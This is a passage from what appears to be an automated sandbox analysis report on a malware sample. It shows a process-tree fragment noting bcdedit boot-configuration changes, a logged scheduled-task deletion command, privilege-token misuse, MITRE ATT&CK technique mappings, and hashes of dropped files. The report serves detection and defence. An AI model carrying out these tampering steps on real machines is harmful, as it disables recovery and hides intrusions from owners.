        - Modifies boot configuration data using bcdedit
    [3] C:\Windows\system32\schtasks.exe | SCHTASKS /Delete /TN DSHCA /F | PID 6496
[1] C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | PID 5524
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Defense Evasion
  File and Directory Permissions Modification (1)
  Indicator Removal (2)
    File Deletion (2)
  Modify Registry (2)
Downloads

Filesize: 8KB
MD5: b489f379df560877cca09ea782805b85
SHA1: 283d698d19db8bfa1df596f1eddd8531d3a20e2a
SHA256: f1799a033930152890a4702d1c17486c8b3b9f3dff46e4e63abe4395e7b5bb94
SHA512: 9d1df6eb452d44a905c955f62f60309d50abeb164ff5c75d12f908694f5af55bec1bfc18fd75be8d06b3fc52f38be7bafc6083ff7ff0893689e0e12521bc1feb

Filesize: 16B
MD5: 17d432845dc7cb55ac69d75cf72f7f5d
SHA1: 7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256: a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA512: 25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Filesize: 226B
MD5: c4b644f20704be18e73bcfbea10171f5
SHA1: 9052bd82996f2708d5a80c103208bc518d1ee132
SHA256: cc4d7730792e84f56a3079f90e911ec7c43915d96f9c13af92c59df2a5ef186c
SHA512: 22906747dba0cb179d1d8be5ef5333eeaa8f6eebe32f90ee5b4eb29e1ec5cefe7200cf1e67d0f735942e14b9cf9e469366866bf325b9140991e60772a80b5ffc

Filesize: 807B
MD5: eaf733b692e24ab60fa6be991bc4ed18
SHA1: e372bb8545af6b22ff9737279c22b6667e186077
SHA256: e0c103f34c5044b0e86597c4c6dc0550d2c07da913d2e19db27a5e8881597dad
SHA512: 8d9bf5e7fdabd2be69ac8282f95adf9a8c5a09c6d52fe84dfc2694a925d071828ed37f57fcb7193f9afb64aae3f3742de7c22d221bfd0b7b9a0427354ec5a840

Filesize: 874B
MD5: f5c7aa12621e9af6d659d32b91b0e996
SHA1: 26e2e6faf411a5243d008996a69a8a6b1febaa87
SHA256: 6449e64771413c96ce1b65c1a94cc02d3e121863fa1163edcd387038dc4ef09e
SHA512: d4c4d2a96be4278313b73ca858ac4c81a7c1f7e1c3ba8866e12d01fdc09aa82e571e1301232e77b1f1a54b993d2c1778f56f54f9c65c67ad7cb997d77c4dcd32

Filesize: 1KB
MD5: 89304a844a8715604483a3fe42dc6e01
SHA1: 45742088364c3c92fce6eb143a8f389e612a3ad8
SHA256: 34a3830fd5ff69dd442600dbb163af5ff33fba760da8ddd1d62eb8b32ef5f96f
SHA512: f8506632ae3a6124bafe587fe2da47d635fdac9a16783cd0128dcf6b67033c38ea90b980fb541a5d685680da028677615d12ee7ecb783c6a2456d029096bc04b

Filesize: 1KB
MD5: 055d7dca6d8a74db6ea5f5073d981d10
SHA1: b1b320e9a08e74a6aa33b61729de9043fbce51cd
SHA256: 55431b1e05c689c08ef4fe465e1366358acecb5bef090c0eaf8df2b824f3ac62
SHA512: 5dd7a8add1899a2daab0ffc0cefac35d1f8938eedff036fed2e8bcaa3f7f3342ea4eac8543c36937dabe54026e1741b3eb0bccb4f5bbe59dc014074cf77cba97

Filesize: 2KB
MD5: a48bf900d9b33cf80593ce4c604b719e
SHA1: cbcc08407348e3753d2228150a046a03de6e463a
SHA256: b3e4f0683bd7354fe6c440960105bb77d7d10e282fdffbcc3726e5fe6b8a8473
SHA512: 42e74e98a48a1856a53fba341a567ecf39b4a26af74410712680996b32ad3eaaeff8018184aa4e8a091e5b0ef1c87997e21bf2bad298b75fc6a07e7172d29c34

Filesize: 3KB
MD5: e4dc50ca2ccfa5ac652f992f63d7481d
SHA1: ed63ee6b240d130ff6c9b3ed7eb4f59cd3669c7d
SHA256: 21df128a49b9f904fa9ffc4c7f862279758794ef0afeab48ba86c4698e46bd61
SHA512: fa7c198a915d68fe718be8b88c757c1454f118384ab6fafedfa6717d3bd82e180d7981eccc350eb107f93fbf487f10dd4f83774144d5587ad3a81e6c846af9d0

Filesize: 3KB
MD5: 4cb149967f3a586912b82e0f2e035367
SHA1: d1156b9c80e70550649c40cf68b2487c058cec5f
SHA256: 43cd4a5350d0eb783ba6d10c22bcf66d0e0247924fd6fe98afac899ceeebb0a5
SHA512: 86de12018e08b756cd89855a8c0a98db58c0a287d3bef64843ef74f751c86ac84f865867c6d0d5bd523870b4dc5dd2992174137796baf5c65e7a50643858e86c

Filesize: 24KB
MD5: 0bf32abbbe841d22bed59d971e8ce824
SHA1: e96eda54374b80296c6a56bd67f557e9bcadd3a7
SHA256: 59d94f886ab1bd11f61b6477a9245f8c8cd355b1081fa7bb3b312895d64c7000
SHA512: 19d9fcadcd1a0ef8fb5e143cd6de25ac6975dc10f389d642e71b434e1f9dc763040428dd3a3132a9a2a7ee02f790eb24da13de7f0e2a6b05c7d95addb88503dc

Filesize: 221KB
MD5: 3026bc2448763d5a9862d864b97288ff
SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Filesize: 265B
MD5: eb40a55e6b5f6c9e5b3c66beea9f19ed
SHA1: bde8c21003af48255525233098cd21de66ca0103
SHA256: 22560fd320259730d9f2f6198eb90eaa0872f014200525fd4cd269a2a6020a29
SHA512: 00e0fde9ad1b50e2e9d9619b7b0d7a604de631114ce159b299b93832b8b092c146c0dfdd4fa04161bf39f99944c7b7617bb0a5b82c698eebab5938bef1a89189

Filesize: 260B
MD5: 25a19c0854fbf74056205169a2626e19
SHA1: 977f9dc942b1751cfba571f5a3f9710c6ee56a88
SHA256: 4cf55fe823f77622cfa5c0456c5e283b4370f1733439daca0640ee079410c9eb
SHA512: 71f0fe1fc50f2511a93708e917d3bc627090973686240fad9d7ea41ce20a3e9526e5f320e9040ad39c1cd43666d2963948d63bed8072fd5ee88abf11050a3d37

Filesize: 181KB
MD5: 2f5b509929165fc13ceab9393c3b911d
SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Filesize: 1.2MB
MD5: 268360527625d09e747d9f7ab1f84da5
SHA1: 09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1